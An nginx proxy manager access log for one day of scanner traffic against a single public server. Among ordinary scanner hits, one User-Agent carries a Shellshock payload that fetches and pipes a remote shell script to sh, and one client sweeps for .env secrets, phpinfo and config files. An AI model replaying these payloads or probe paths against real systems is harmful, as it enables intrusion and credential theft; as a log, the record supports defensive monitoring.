+[16/Jan/2026:05:37:39 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; EVA-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[16/Jan/2026:05:45:01 +0000] 400 - GET http 92.249.249.197 "/" [Client 20.80.88.160] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[16/Jan/2026:05:45:01 +0000] 400 - - http localhost "-" [Client 20.80.88.160] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:05:54:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:06:04:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 20.46.228.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[16/Jan/2026:06:08:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.106] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:06:08:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.106] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:06:12:51 +0000] 404 - GET http 92.249.249.197 "/developmentserver/metadatauploader" [Client 20.169.49.41] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[16/Jan/2026:06:14:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:06:17:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:06:18:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:06:20:24 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[16/Jan/2026:06:22:50 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[16/Jan/2026:06:33:36 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:06:35:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 34.14.103.46] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[16/Jan/2026:06:43:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:06:46:00 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[16/Jan/2026:06:46:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[16/Jan/2026:06:55:50 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.94.138.181] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:06:55:54 +0000] 400 - - http localhost "-" [Client 167.94.138.181] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:06:56:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:06:56:57 +0000] 400 - GET http 92.249.249.197 "/robots.txt" [Client 167.94.138.181] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:07:05:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 172.237.117.146] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[16/Jan/2026:07:09:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:07:16:51 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:07:18:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:07:34:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:07:37:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:07:47:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:07:56:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:08:04:54 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:08:05:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:08:08:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.237.117.146] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:08:08:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 172.237.117.146] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[16/Jan/2026:08:25:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:08:29:38 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 45.139.104.168] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0" "-" +[16/Jan/2026:08:36:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:08:49:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:08:53:21 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:09:00:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:09:11:16 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:09:11:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:09:17:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:09:28:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[16/Jan/2026:09:39:49 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:09:39:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:09:49:36 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 23.95.96.140] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[16/Jan/2026:09:56:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:10:00:28 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)" "-" +[16/Jan/2026:10:00:28 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" "-" +[16/Jan/2026:10:00:28 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11" "-" +[16/Jan/2026:10:00:28 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; Transformer TF101 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[16/Jan/2026:10:00:29 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11" "-" +[16/Jan/2026:10:00:29 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; ALCATEL ONE TOUCH 5020N Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Mobile Safari/534.30" "-" +[16/Jan/2026:10:00:29 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" "-" +[16/Jan/2026:10:00:29 +0000] 200 - GET http 92.249.249.197 "/?url=.env" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.99 Safari/537.36 OPR/35.0.2070.100283" "-" +[16/Jan/2026:10:00:29 +0000] 404 - GET http 92.249.249.197 "/staging/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;NLBE)" "-" +[16/Jan/2026:10:00:29 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Android 5.0.2; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.1" "-" +[16/Jan/2026:10:00:29 +0000] 404 - GET http 92.249.249.197 "/phpinfo.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.0; fr; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17" "-" +[16/Jan/2026:10:00:30 +0000] 404 - GET http 92.249.249.197 "/info/" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.8 Safari/537.36 OPR/40.0.2301.0 (Edition developer)" "-" +[16/Jan/2026:10:00:30 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36" "-" +[16/Jan/2026:10:00:30 +0000] 404 - GET http 92.249.249.197 "/phpinfo/" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; KFGIWI Build/LVY48F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36 OPR/37.0.2192.105088" "-" +[16/Jan/2026:10:00:30 +0000] 404 - GET http 92.249.249.197 "/dev/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[16/Jan/2026:10:00:30 +0000] 404 - GET http 92.249.249.197 "/.env.production" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/.env.save" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/demo/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:59.0) Gecko/20100101 Firefox/59.0" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/laravel/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/.config.yaml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla / 5.0(Macintosh; U; Intel Mac OS X 10_5_5; en - us) AppleWebKit / 525.25(KHTML, like Gecko) Version / 3.2 Safari / 525.25" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/info" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A365 Safari/600.1.4" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/secrets.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.13" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/core/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.6" "-" +[16/Jan/2026:10:00:31 +0000] 404 - GET http 92.249.249.197 "/server/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56 Safari/537.17" "-" +[16/Jan/2026:10:00:32 +0000] 404 - GET http 92.249.249.197 "/test/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 5.0.1; en-US; GT-I9505 Build/LRX22C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/10.9.8.770 U3/0.8.0 Mobile Safari/534.30" "-" +[16/Jan/2026:10:03:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:10:08:05 +0000] 400 - - http localhost "-" [Client 88.214.25.121] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:10:30:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:10:50:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:10:51:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:10:53:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:11:07:36 +0000] 400 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[16/Jan/2026:11:07:36 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 252] [Gzip -] "-" "-" +[16/Jan/2026:11:07:58 +0000] 400 - - http localhost "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:11:08:19 +0000] 400 - - http localhost "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:11:10:27 +0000] 400 - GET http 92.249.249.197 "/" [Client 162.142.125.207] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:11:10:31 +0000] 400 - - http localhost "-" [Client 162.142.125.207] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:11:10:40 +0000] 400 - GET http 92.249.249.197 "/sitemap.xml" [Client 162.142.125.207] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:11:12:39 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:11:18:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:11:18:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 185.180.140.109] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[16/Jan/2026:11:40:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:11:43:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:11:55:23 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.160.95.118] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[16/Jan/2026:12:11:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:12:21:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 199.45.154.141] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:12:21:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.154.141] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:12:21:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.154.141] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:12:21:07 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:12:21:16 +0000] 404 - GET http 92.249.249.197 "/login" [Client 199.45.154.141] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:12:21:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.154.141] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:12:21:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:12:24:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 65.49.1.52] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" "-" +[16/Jan/2026:12:25:41 +0000] 404 - GET http 92.249.249.197 "/webui/" [Client 65.49.1.52] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[16/Jan/2026:12:27:53 +0000] 404 - GET http 92.249.249.197 "/geoserver/web/" [Client 65.49.1.52] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" "-" +[16/Jan/2026:12:32:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:12:35:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:12:41:21 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:12:44:48 +0000] 400 - - http localhost "-" [Client 146.190.241.56] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:12:50:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:12:58:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:13:15:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[16/Jan/2026:13:24:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:13:25:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:13:40:30 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:40:30 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:40:31 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:40:31 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:40:31 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:40:32 +0000] 400 - - http localhost "-" [Client 162.216.150.10] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:46:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:13:48:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[16/Jan/2026:13:48:28 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] 